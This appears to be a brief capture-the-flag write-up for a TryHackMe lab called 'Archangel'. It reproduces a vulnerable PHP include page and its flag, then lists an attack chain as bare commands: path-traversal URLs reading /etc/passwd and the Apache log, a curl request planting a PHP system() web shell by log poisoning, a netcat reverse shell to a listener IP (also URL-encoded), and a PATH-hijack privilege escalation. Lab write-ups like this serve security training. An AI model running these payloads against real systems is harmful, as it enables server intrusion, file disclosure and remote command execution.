Archangel
May 09, 2024
<!DOCTYPE HTML>
<html>
<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>
</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
<?php
//FLAG: thm{explo1t1ng_lf1}
/**
 * Reports whether $substr occurs anywhere inside $str.
 *
 * This is a byte-wise, case-sensitive substring test and nothing more: it
 * does not anchor the match to the start of the string and it does not
 * normalise or resolve the value as a filesystem path.
 *
 * @param string $str    Text to search in.
 * @param string $substr Text to look for.
 * @return bool True when $substr is found, false otherwise.
 */
function containsStr($str, $substr) {
    $offset = strpos($str, $substr);
    // strpos() yields offset 0 for a match at the very start, so the result
    // must be compared against false by type rather than by truthiness.
    if ($offset === false) {
        return false;
    }
    return true;
}
// Request handler: runs only when a "view" query parameter is supplied.
if(isset($_GET["view"])){
// NOTE(security): both conditions are substring tests on the raw request value.
//  - The first rejects only the literal sequence '../..'; a value whose dot
//    segments are separated differently (e.g. by a doubled slash) is not caught.
//  - The second only requires the directory name to appear somewhere in the
//    value; it does not check that the resolved path stays inside that directory.
// Neither check canonicalises the path before deciding.
if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
// include evaluates any PHP contained in the target file, so reaching a
// readable file outside the intended directory means code execution, not only
// disclosure. Safer pattern: map the parameter to a fixed allowlist of page
// names, or resolve it with realpath() and require the result to begin with
// the base directory followed by a directory separator.
include $_GET['view'];
}else{
// Rejection path: the value failed one of the two substring checks above.
echo 'Sorry, Thats not allowed';
}
}
?>
</div>
</body>
</html>
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//..//etc/passwd
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//..//var/log/apache2/access.log
curl -s 'http://mafialive.thm/test.php' -A '<?php system($_GET['cmd']); ?>'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%39%2e%31%39%33%2e%32%32%39%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66
nano cp
cat cp
chmod +x cp
export PATH=/home/archangel:$PATH
echo $PATH